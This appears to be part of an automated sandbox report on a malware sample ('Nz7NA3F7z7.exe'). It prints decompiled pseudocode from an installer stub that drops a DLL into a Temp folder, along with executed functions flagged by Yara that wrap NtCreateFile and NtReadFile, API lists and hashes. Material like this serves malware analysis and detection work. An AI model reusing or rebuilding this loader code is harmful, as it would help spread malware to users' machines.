                                                                                    					_t16 =  *( *0x42ec30 + 0x64);
                                                                                    					_t20 =  ~_t16;
                                                                                    					_t18 = _t16 * _t26 +  *0x42ec60;
                                                                                    					while(1) {
                                                                                    						_t18 = _t18 + _t20;
                                                                                    						_t26 = _t26 - 1;
                                                                                    						if((( *_t18 ^ _t6) & _t13) == 0) {
                                                                                    							break;
                                                                                    						}
                                                                                    						if(_t26 != 0) {
                                                                                    							continue;
                                                                                    						}
                                                                                    						goto L7;
                                                                                    					}
                                                                                    					 *0x42e400 = _t18[1];
                                                                                    					 *0x42ecc8 = _t18[3];
                                                                                    					_t23 =  &(_t18[5]);
                                                                                    					if(_t23 != 0) {
                                                                                    						 *0x42e3fc = _t23;
                                                                                    						E00405B25(_t24,  *_t18 & 0x0000ffff);
                                                                                    						SetWindowTextA( *0x42a078, E00405BE9(_t13, _t24, _t26, 0x42e420, 0xfffffffe));
                                                                                    						_t11 =  *0x42ec4c;
                                                                                    						_t27 =  *0x42ec48;
                                                                                    						if(_t11 == 0) {
                                                                                    							L15:
                                                                                    							return _t11;
                                                                                    						}
                                                                                    						_t25 = _t11;
                                                                                    						do {
                                                                                    							_t11 =  *_t27;
                                                                                    							if(_t11 != 0) {
                                                                                    								_t11 = E00405BE9(_t13, _t25, _t27, _t27 + 0x18, _t11);
                                                                                    							}
                                                                                    							_t27 = _t27 + 0x418;
                                                                                    							_t25 = _t25 - 1;
                                                                                    						} while (_t25 != 0);
                                                                                    						goto L15;
                                                                                    					}
                                                                                    					L7:
                                                                                    					if(_t13 != 0xffff) {
                                                                                    						_t13 = 0;
                                                                                    					} else {
                                                                                    						_t13 = 0x3ff;
                                                                                    					}
                                                                                    				}
                                                                                    			}
















                                                                                    0x004038e7
                                                                                    0x004038ec
                                                                                    0x004038f2
                                                                                    0x004038f7
                                                                                    0x004038f7
                                                                                    0x004038ff
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403907
                                                                                    0x0040390f
                                                                                    0x00403911
                                                                                    0x00403917
                                                                                    0x00403917
                                                                                    0x00403919
                                                                                    0x00403925
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00403929
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040392b
                                                                                    0x00403930
                                                                                    0x00403939
                                                                                    0x0040393f
                                                                                    0x00403944
                                                                                    0x00403958
                                                                                    0x00403963
                                                                                    0x0040397b
                                                                                    0x00403981
                                                                                    0x00403986
                                                                                    0x0040398e
                                                                                    0x004039af
                                                                                    0x004039af
                                                                                    0x004039af
                                                                                    0x00403990
                                                                                    0x00403992
                                                                                    0x00403992
                                                                                    0x00403996
                                                                                    0x0040399d
                                                                                    0x0040399d
                                                                                    0x004039a2
                                                                                    0x004039a8
                                                                                    0x004039a8
                                                                                    0x00000000
                                                                                    0x00403992
                                                                                    0x00403946
                                                                                    0x0040394b
                                                                                    0x00403954
                                                                                    0x0040394d
                                                                                    0x0040394d
                                                                                    0x0040394d
                                                                                    0x0040394b

                                                                                    APIs
                                                                                    • SetWindowTextA.USER32(00000000,0042E420), ref: 0040397B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: TextWindow
                                                                                    • String ID: "C:\Users\user\Desktop\Nz7NA3F7z7.exe" $1033
                                                                                    • API String ID: 530164218-2957225932
                                                                                    • Opcode ID: 44086840014d5f932eec3ecda3fe01ed682aa00d856216dbdc4f037c80fefe2b
                                                                                    • Instruction ID: 62fcd584ab61880d0a0793d1f8a393d96878735a1f32199b1fca161b6814d522
                                                                                    • Opcode Fuzzy Hash: 44086840014d5f932eec3ecda3fe01ed682aa00d856216dbdc4f037c80fefe2b
                                                                                    • Instruction Fuzzy Hash: 7F1105B1B046119BC7349F57DC809737BACEB85715368813FE8016B3A0DA79AD03CB98
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00404E03(struct HWND__* _a4, int _a8, int _a12, long _a16) {
                                                                                    				long _t22;
                                                                                    
                                                                                    				if(_a8 != 0x102) {
                                                                                    					if(_a8 != 0x200) {
                                                                                    						_t22 = _a16;
                                                                                    						L7:
                                                                                    						if(_a8 == 0x419 &&  *0x42a088 != _t22) {
                                                                                    							 *0x42a088 = _t22;
                                                                                    							E00405BC7(0x42a0a0, 0x42f000);
                                                                                    							E00405B25(0x42f000, _t22);
                                                                                    							E0040140B(6);
                                                                                    							E00405BC7(0x42f000, 0x42a0a0);
                                                                                    						}
                                                                                    						L11:
                                                                                    						return CallWindowProcA( *0x42a090, _a4, _a8, _a12, _t22);
                                                                                    					}
                                                                                    					if(IsWindowVisible(_a4) == 0) {
                                                                                    						L10:
                                                                                    						_t22 = _a16;
                                                                                    						goto L11;
                                                                                    					}
                                                                                    					_t22 = E00404782(_a4, 1);
                                                                                    					_a8 = 0x419;
                                                                                    					goto L7;
                                                                                    				}
                                                                                    				if(_a12 != 0x20) {
                                                                                    					goto L10;
                                                                                    				}
                                                                                    				E00403ECF(0x413);
                                                                                    				return 0;
                                                                                    			}




                                                                                    0x00404e0f
                                                                                    0x00404e34
                                                                                    0x00404e54
                                                                                    0x00404e57
                                                                                    0x00404e5a
                                                                                    0x00404e71
                                                                                    0x00404e77
                                                                                    0x00404e7e
                                                                                    0x00404e85
                                                                                    0x00404e8c
                                                                                    0x00404e91
                                                                                    0x00404e97
                                                                                    0x00000000
                                                                                    0x00404ea7
                                                                                    0x00404e41
                                                                                    0x00404e94
                                                                                    0x00404e94
                                                                                    0x00000000
                                                                                    0x00404e94
                                                                                    0x00404e4d
                                                                                    0x00404e4f
                                                                                    0x00000000
                                                                                    0x00404e4f
                                                                                    0x00404e15
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00404e1c
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • IsWindowVisible.USER32(?), ref: 00404E39
                                                                                    • CallWindowProcA.USER32 ref: 00404EA7
                                                                                      • Part of subcall function 00403ECF: SendMessageA.USER32(?,00000000,00000000,00000000), ref: 00403EE1
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                    • String ID:
                                                                                    • API String ID: 3748168415-3916222277
                                                                                    • Opcode ID: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
                                                                                    • Instruction ID: a1b1c3265e10147a864b820895246e20bcc7fdce94b5a9a997a836c51e1a414d
                                                                                    • Opcode Fuzzy Hash: bb110161f1a3672e5f414d3b7256019bd36f5b3292f6cf5a111e70d7da7d909c
                                                                                    • Instruction Fuzzy Hash: 4C113D71500218ABDB215F51DC44E9B3B69FB44759F00803AFA18691D1C77C5D619FAE
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E004024F1(struct _OVERLAPPED* __ebx, intOrPtr* __esi) {
                                                                                    				int _t5;
                                                                                    				long _t7;
                                                                                    				struct _OVERLAPPED* _t11;
                                                                                    				intOrPtr* _t15;
                                                                                    				void* _t17;
                                                                                    				int _t21;
                                                                                    
                                                                                    				_t15 = __esi;
                                                                                    				_t11 = __ebx;
                                                                                    				if( *((intOrPtr*)(_t17 - 0x20)) == __ebx) {
                                                                                    					_t7 = lstrlenA(E00402A29(0x11));
                                                                                    				} else {
                                                                                    					E00402A0C(1);
                                                                                    					 *0x40a040 = __al;
                                                                                    				}
                                                                                    				if( *_t15 == _t11) {
                                                                                    					L8:
                                                                                    					 *((intOrPtr*)(_t17 - 4)) = 1;
                                                                                    				} else {
                                                                                    					_t5 = WriteFile(E00405B3E(_t17 + 8, _t15), "C:\Users\hardz\AppData\Local\Temp\nso7CE9.tmp\eeysn2cunceh9.dll", _t7, _t17 + 8, _t11);
                                                                                    					_t21 = _t5;
                                                                                    					if(_t21 == 0) {
                                                                                    						goto L8;
                                                                                    					}
                                                                                    				}
                                                                                    				 *0x42eca8 =  *0x42eca8 +  *((intOrPtr*)(_t17 - 4));
                                                                                    				return 0;
                                                                                    			}









                                                                                    0x004024f1
                                                                                    0x004024f1
                                                                                    0x004024f4
                                                                                    0x0040250f
                                                                                    0x004024f6
                                                                                    0x004024f8
                                                                                    0x004024fd
                                                                                    0x00402504
                                                                                    0x00402516
                                                                                    0x0040268f
                                                                                    0x0040268f
                                                                                    0x0040251c
                                                                                    0x0040252e
                                                                                    0x004015a6
                                                                                    0x004015a8
                                                                                    0x00000000
                                                                                    0x004015ae
                                                                                    0x004015a8
                                                                                    0x004028c1
                                                                                    0x004028cd

                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(00000000,00000011), ref: 0040250F
                                                                                    • WriteFile.KERNEL32(00000000,?,C:\Users\user\AppData\Local\Temp\nso7CE9.tmp\eeysn2cunceh9.dll,00000000,?,?,00000000,00000011), ref: 0040252E
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\nso7CE9.tmp\eeysn2cunceh9.dll, xrefs: 004024FD, 00402522
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: FileWritelstrlen
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\nso7CE9.tmp\eeysn2cunceh9.dll
                                                                                    • API String ID: 427699356-1774131503
                                                                                    • Opcode ID: 76b72eb1bb037845af2373cb3d3fbf761991c376917fb0c01088b7ebefde820f
                                                                                    • Instruction ID: 02596e95378ee295436ef63fdf7a12543175d591b2ab5856f5875b5858eb07cb
                                                                                    • Opcode Fuzzy Hash: 76b72eb1bb037845af2373cb3d3fbf761991c376917fb0c01088b7ebefde820f
                                                                                    • Instruction Fuzzy Hash: A7F082B2A04244BFD710EFA59E49AEF7668DB40348F20043BF142B51C2E6BC99419B6E
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00405427(CHAR* _a4) {
                                                                                    				struct _PROCESS_INFORMATION _v20;
                                                                                    				int _t7;
                                                                                    
                                                                                    				0x42c0a8->cb = 0x44;
                                                                                    				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x42c0a8,  &_v20);
                                                                                    				if(_t7 != 0) {
                                                                                    					CloseHandle(_v20.hThread);
                                                                                    					return _v20.hProcess;
                                                                                    				}
                                                                                    				return _t7;
                                                                                    			}





                                                                                    0x00405430
                                                                                    0x0040544c
                                                                                    0x00405454
                                                                                    0x00405459
                                                                                    0x00000000
                                                                                    0x0040545f
                                                                                    0x00405463

                                                                                    APIs
                                                                                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,0042C0A8,Error launching installer), ref: 0040544C
                                                                                    • CloseHandle.KERNEL32(?), ref: 00405459
                                                                                    Strings
                                                                                    • Error launching installer, xrefs: 0040543A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CloseCreateHandleProcess
                                                                                    • String ID: Error launching installer
                                                                                    • API String ID: 3712363035-66219284
                                                                                    • Opcode ID: 352801a7e77fb30640a675ef02418396bf0d6615a7888bd77d000c6466e39ab6
                                                                                    • Instruction ID: 2c90aa490b53110c60c3ebae751c11bf5c05897806c56d3989ec330efb9c4960
                                                                                    • Opcode Fuzzy Hash: 352801a7e77fb30640a675ef02418396bf0d6615a7888bd77d000c6466e39ab6
                                                                                    • Instruction Fuzzy Hash: 35E0ECB4A04209BFDB109FA4EC49AAF7BBCFB00305F408521AA14E2150E774D8148AA9
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00403585() {
                                                                                    				void* _t2;
                                                                                    				void* _t3;
                                                                                    				void* _t6;
                                                                                    				void* _t8;
                                                                                    
                                                                                    				_t8 =  *0x42905c;
                                                                                    				_t3 = E0040356A(_t2, 0);
                                                                                    				if(_t8 != 0) {
                                                                                    					do {
                                                                                    						_t6 = _t8;
                                                                                    						_t8 =  *_t8;
                                                                                    						FreeLibrary( *(_t6 + 8));
                                                                                    						_t3 = GlobalFree(_t6);
                                                                                    					} while (_t8 != 0);
                                                                                    				}
                                                                                    				 *0x42905c =  *0x42905c & 0x00000000;
                                                                                    				return _t3;
                                                                                    			}







                                                                                    0x00403586
                                                                                    0x0040358e
                                                                                    0x00403595
                                                                                    0x00403598
                                                                                    0x00403598
                                                                                    0x0040359a
                                                                                    0x0040359f
                                                                                    0x004035a6
                                                                                    0x004035ac
                                                                                    0x004035b0
                                                                                    0x004035b1
                                                                                    0x004035b9

                                                                                    APIs
                                                                                    • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,?,0040355D,00403366,00000020), ref: 0040359F
                                                                                    • GlobalFree.KERNEL32 ref: 004035A6
                                                                                    Strings
                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403597
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: Free$GlobalLibrary
                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                    • API String ID: 1100898210-3916508600
                                                                                    • Opcode ID: ac7f27994bd3325b2d0095e79668b7c9fa9e3b8299eadab29ed3cfae008e212f
                                                                                    • Instruction ID: 66eb0e2672836502cdeb887367c424fec6a3009010210fcd00c586b28cfd98d1
                                                                                    • Opcode Fuzzy Hash: ac7f27994bd3325b2d0095e79668b7c9fa9e3b8299eadab29ed3cfae008e212f
                                                                                    • Instruction Fuzzy Hash: 45E0C233900130A7CB715F44EC0475A776C6F49B22F010067ED00772B0C3742D424BD8
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00405701(char* _a4) {
                                                                                    				char* _t3;
                                                                                    				char* _t5;
                                                                                    
                                                                                    				_t5 = _a4;
                                                                                    				_t3 =  &(_t5[lstrlenA(_t5)]);
                                                                                    				while( *_t3 != 0x5c) {
                                                                                    					_t3 = CharPrevA(_t5, _t3);
                                                                                    					if(_t3 > _t5) {
                                                                                    						continue;
                                                                                    					}
                                                                                    					break;
                                                                                    				}
                                                                                    				 *_t3 =  *_t3 & 0x00000000;
                                                                                    				return  &(_t3[1]);
                                                                                    			}





                                                                                    0x00405702
                                                                                    0x0040570c
                                                                                    0x0040570e
                                                                                    0x00405715
                                                                                    0x0040571d
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x00000000
                                                                                    0x0040571d
                                                                                    0x0040571f
                                                                                    0x00405724

                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Nz7NA3F7z7.exe,C:\Users\user\Desktop\Nz7NA3F7z7.exe,80000000,00000003), ref: 00405707
                                                                                    • CharPrevA.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402CC1,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Nz7NA3F7z7.exe,C:\Users\user\Desktop\Nz7NA3F7z7.exe,80000000,00000003), ref: 00405715
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: CharPrevlstrlen
                                                                                    • String ID: C:\Users\user\Desktop
                                                                                    • API String ID: 2709904686-1669384263
                                                                                    • Opcode ID: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                                                    • Instruction ID: 28705abfcf709d76dd5e93a9f01d56f8a4c6275228320a945a5a59c68c4d3cd5
                                                                                    • Opcode Fuzzy Hash: 5e76a858232fdb919b52e4d2bd39b139441124952f2503eefa3b06bf6f304fbe
                                                                                    • Instruction Fuzzy Hash: 21D0A762409D709EF30363148C04B9F7A88CF12300F0904A2E580A3191C2785C414BBD
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00405813(CHAR* _a4, CHAR* _a8) {
                                                                                    				int _t10;
                                                                                    				int _t15;
                                                                                    				CHAR* _t16;
                                                                                    
                                                                                    				_t15 = lstrlenA(_a8);
                                                                                    				_t16 = _a4;
                                                                                    				while(lstrlenA(_t16) >= _t15) {
                                                                                    					 *(_t15 + _t16) =  *(_t15 + _t16) & 0x00000000;
                                                                                    					_t10 = lstrcmpiA(_t16, _a8);
                                                                                    					if(_t10 == 0) {
                                                                                    						return _t16;
                                                                                    					}
                                                                                    					_t16 = CharNextA(_t16);
                                                                                    				}
                                                                                    				return 0;
                                                                                    			}






                                                                                    0x0040581f
                                                                                    0x00405821
                                                                                    0x00405849
                                                                                    0x0040582e
                                                                                    0x00405833
                                                                                    0x0040583e
                                                                                    0x00000000
                                                                                    0x0040585b
                                                                                    0x00405847
                                                                                    0x00405847
                                                                                    0x00000000

                                                                                    APIs
                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040581A
                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 00405833
                                                                                    • CharNextA.USER32(00000000,?,?,00000000,000000F1,?), ref: 00405841
                                                                                    • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,00405A21,00000000,[Rename],?,?,00000000,000000F1,?), ref: 0040584A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.222449800.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.222443832.0000000000400000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222477557.0000000000407000.00000002.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222494200.0000000000409000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222512461.0000000000420000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222518421.000000000042C000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222524983.0000000000434000.00000004.00020000.sdmp Download File
                                                                                    • Associated: 00000000.00000002.222535001.0000000000437000.00000002.00020000.sdmp Download File
                                                                                    Similarity
                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                    • String ID:
                                                                                    • API String ID: 190613189-0
                                                                                    • Opcode ID: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                                                    • Instruction ID: 367b043075f01b00bc0f53d251d01435816a13b74582d12395b7b535bec4825a
                                                                                    • Opcode Fuzzy Hash: 4632bc7807536c3bc685dabbcc96fda575cc955354388b87d625cbceccfb0b7c
                                                                                    • Instruction Fuzzy Hash: 2BF02737208D51AFC2026B255C0092B7F94EF91310B24043EF840F2180E339A8219BBB
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    Executed Functions

                                                                                    APIs
                                                                                    • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID: R=A$R=A
                                                                                    • API String ID: 2738559852-3742021989
                                                                                    • Opcode ID: 87485d30aa8cb18a713a80a56a359a952ffbdaac338d5a925230bf6c8ef1f720
                                                                                    • Instruction ID: d3105f4d5f75fa6480941d81b4b8bd581525c59bab21666af283b4685eccbe10
                                                                                    • Opcode Fuzzy Hash: 87485d30aa8cb18a713a80a56a359a952ffbdaac338d5a925230bf6c8ef1f720
                                                                                    • Instruction Fuzzy Hash: D3F0EC71200108AFCB04DF89DC80DEB77ADAF8C714F158258BE1D97241CA30E8518BA0
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 37%
                                                                                    			E00418270(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
                                                                                    				void* _t18;
                                                                                    				void* _t27;
                                                                                    				intOrPtr* _t28;
                                                                                    
                                                                                    				_t13 = _a4;
                                                                                    				_t28 = _a4 + 0xc48;
                                                                                    				E00418DC0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
                                                                                    				_t6 =  &_a32; // 0x413d52
                                                                                    				_t12 =  &_a8; // 0x413d52
                                                                                    				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
                                                                                    				return _t18;
                                                                                    			}






                                                                                    0x00418273
                                                                                    0x0041827f
                                                                                    0x00418287
                                                                                    0x00418292
                                                                                    0x004182ad
                                                                                    0x004182b5
                                                                                    0x004182b9

                                                                                    APIs
                                                                                    • NtReadFile.NTDLL(R=A,5E972F59,FFFFFFFF,00413A11,?,?,R=A,?,00413A11,FFFFFFFF,5E972F59,00413D52,?,00000000), ref: 004182B5
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: FileRead
                                                                                    • String ID: R=A$R=A
                                                                                    • API String ID: 2738559852-3742021989
                                                                                    • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                    • Instruction ID: 44195af4cfcd7844dc5464a96f27935e8bb9154da72c22cdf586d036b66e8624
                                                                                    • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                                    • Instruction Fuzzy Hash: 8EF0A4B2200208ABCB14DF89DC81EEB77ADAF8C754F158649BA1D97241DA30E8518BA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 35%
                                                                                    			E0041817A(void* __ebx, long __ecx, void* __edx, void* _a1, intOrPtr _a4, intOrPtr _a8, HANDLE* _a12, long _a16, struct _EXCEPTION_RECORD _a20, struct _ERESOURCE_LITE _a24, struct _GUID _a28, long _a32, long _a36, long _a40) {
                                                                                    				signed char _t20;
                                                                                    				long _t25;
                                                                                    				void* _t45;
                                                                                    				void* _t46;
                                                                                    				intOrPtr* _t48;
                                                                                    				long _t50;
                                                                                    
                                                                                    				asm("stc");
                                                                                    				if(__ecx >=  *((intOrPtr*)(__edx + 0x53))) {
                                                                                    					 *(__ebx - 0x3b7cd3b3) =  *(__ebx - 0x3b7cd3b3) ^ __ecx;
                                                                                    					asm("adc al, 0x52");
                                                                                    					_t25 = NtCreateFile(_a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, __ecx, _t20 ^ 0x0000008b, _t50); // executed
                                                                                    					return _t25;
                                                                                    				} else {
                                                                                    					_t26 = _a4;
                                                                                    					_t4 = _t26 + 0xc3c; // 0xc64
                                                                                    					_t48 = _t4;
                                                                                    					E00418DC0(_t45, _a4, _t48,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x27);
                                                                                    					return  *((intOrPtr*)( *_t48))(_a8, _a12, _a16, _a20, _a24, _t46, _t50);
                                                                                    				}
                                                                                    			}









                                                                                    0x0041817a
                                                                                    0x0041817e
                                                                                    0x004181e1
                                                                                    0x004181e7
                                                                                    0x0041820d
                                                                                    0x00418211
                                                                                    0x00418180
                                                                                    0x00418183
                                                                                    0x0041818f
                                                                                    0x0041818f
                                                                                    0x00418197
                                                                                    0x004181b9
                                                                                    0x004181b9

                                                                                    APIs
                                                                                    • NtCreateFile.NTDLL(00000060,00408AF3,?,00413B97,00408AF3,FFFFFFFF,?,?,FFFFFFFF,00408AF3,00413B97,?,00408AF3,00000060,00000000,00000000), ref: 0041820D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.275240256.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: CreateFile
                                                                                    • String ID:
                                                                                    • API String ID: 823142352-0
                                                                                    • Opcode ID: 84ab12f38130ba6374c4d5e4bd2e4226f3d05ceb612b97be0999a57cad77d801
                                                                                    • Instruction ID: 89afb2f1cf6171b8558e0c7e0ca09a0a510f862957134e4a4b828be0d8d9e918
                                                                                    • Opcode Fuzzy Hash: 84ab12f38130ba6374c4d5e4bd2e4226f3d05ceb612b97be0999a57cad77d801
                                                                                    • Instruction Fuzzy Hash: BF11E2B2204209BBCB08CF98DC84DEB77ADAF8C754B15864DFA5D97241CA30E8518BA4
                                                                                    Uniqueness

                                                                                    Uniqueness Score: -1.00%

                                                                                    C-Code - Quality: 100%
                                                                                    			E00409B20(void* __eflags, void* _a4, intOrPtr _a8) {
                                                                                    				char* _v8;
                                                                                    				struct _EXCEPTION_RECORD _v12;
                                                                                    				struct _OBJDIR_INFORMATION _v16;
                                                                                    				char _v536;
